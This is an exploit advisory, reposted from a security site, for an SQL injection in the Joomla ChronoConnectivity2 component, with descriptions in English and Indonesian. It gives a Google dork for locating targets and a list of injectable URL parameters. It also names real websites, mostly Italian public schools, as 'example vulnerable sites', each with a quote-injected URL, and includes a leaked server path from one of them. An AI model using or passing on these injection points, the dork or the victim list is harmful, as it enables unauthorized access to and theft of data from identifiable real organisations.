Information Exploit
# Exploit Title : Joomla ChronoConnectivity2 Components 6.0.7 SQL Injection
# Author Exploit : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 01/02/2019
# Vendor Homepage : chronoengine.com
# Software Download Link : chronoengine.com/chronoconnectivity/download
# Software Information Link : extensions.joomla.org/extension/chrono-connectivity/
# Software Version : 6.0.7
# Other Affected Versions : V5.0.6_Component - V5.0_Plugin_RC1 - V4_RC3.2_J1.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_chronoconnectivity2''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# [English] Description about Software :
************************************
ChronoConnectivity is a raw CCK (Content constructions kit) for Joomla, it helps you
list and manage (delete/update) the data in any of your database tables, with
full permissions support, and full integration with Chronoforms.
Display and manage data from any MySQL database, build Joomla reports
and data tables easily and with huge list of features using ChronoConnectivity.
# [Indonesia] Keterangan tentang Perangkat Lunak :
********************************************
ChronoConnectivity adalah CCK mentah (Kit konstruksi konten) untuk Joomla,
ini membantu Anda daftar dan kelola (hapus / perbarui) data di salah satu tabel basis
data Anda, dengan dukungan izin penuh, dan integrasi penuh dengan Chronoforms.
Tampilkan dan kelola data dari basis data MySQL apa pun, buat laporan Joomla
dan tabel data dengan mudah dan dengan daftar besar fitur
menggunakan ChronoConnectivity.
# [English] Impact :
******************
Joomla ChronoConnectivity2 6.0.7 and other versions component for Joomla! is
prone to an SQL-injection vulnerability because it fails to sufficiently
sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access
or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application
and execute arbitrary SQL commands in application`s database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
# [Indonesia] Dampak :
*********************
Joomla ChronoConnectivity2 6.0.7 dan komponen versi lainnya untuk Joomla!
rawan kerentanan SQL-injeksi karena gagal untuk cukup
membersihkan data yang disediakan pengguna sebelum menggunakannya
dalam queri SQL.
Eksploitasi yang berhasil memungkinkan penyerang untuk berkompromi dengan
aplikasi, akses atau memodifikasi data, atau mengeksploitasi kerentanan dalam
database yang mendasarinya.
Penyerang jarak jauh dapat mengirim permintaan yang dibuat khusus ke aplikasi
yang rentan dan menjalankan perintah SQL sewenang-wenang dalam basis data aplikasi.
Eksploitasi lebih lanjut dari kerentanan ini dapat mengakibatkan manipulasi data yang tidak sah.
Seorang penyerang dapat mengeksploitasi masalah ini menggunakan browser.
# SQL Injection Poc :
**************************
/index.php?option=com_chronoconnectivity&Itemid=[SQL Injection]
/index.php?option=com_chronoconnectivity&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
/index.php?option=com_chronoconnectivity2&Itemid=[SQL Injection]
/index.php?option=com_chronoconnectivity2&connectionname=[FOLDER-NAME]&start=&Itemid=[SQL Injection]
/index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection]
/index.php?option=com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
/index.php?option=com_chronoconnectivity2&connectionname=albo_storico_accessibili&cat=[ID-NUMBER]&Itemid=[SQL Injection]
/component/chronoconnectivity2/index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection]
# Example Vulnerable Sites :
**************************
[+] iccapuana.gov.it/albopretorio/index.php?option=
com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=1%27
[+] icdelpo.gov.it/home/index.php?option=com_chronoconnectivity2&Itemid=146%27
[+] issvigano.gov.it/joomla15/index.php?option=com_chronoconnectivity2&Itemid=60%27
[+] iisdefilippisprestia.gov.it/archivio/joomla15/index.php?option=
com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=5&limitstart=75%27
[+] ics-casalserugo.gov.it/joomla/albo/index.php?option=
com_chronoconnectivity2&connectionname=albo_storico_accessibili&cat=3&Itemid=10%27
[+] ictravagliato.gov.it/15albo/index.php?option=
com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=5&start=&Itemid=5%27
[+] polobianciardigrosseto.it/portal/index.php?option=com_chronoconnectivity2&Itemid=309%27
[+] liad-alger.fr/joomla_eleves/index.php?option=com_chronoconnectivity&Itemid=32&limitstart=60%27
****************************
Strict Standards: Non-static method JLoader::import()
should not be called statically in /web/htdocs
/www.iisdefilippisprestia.gov.it/home/archivio
/joomla15/libraries/joomla/import.php on line 29
Sumber Exploit [cxsecurity.com]
0 Comments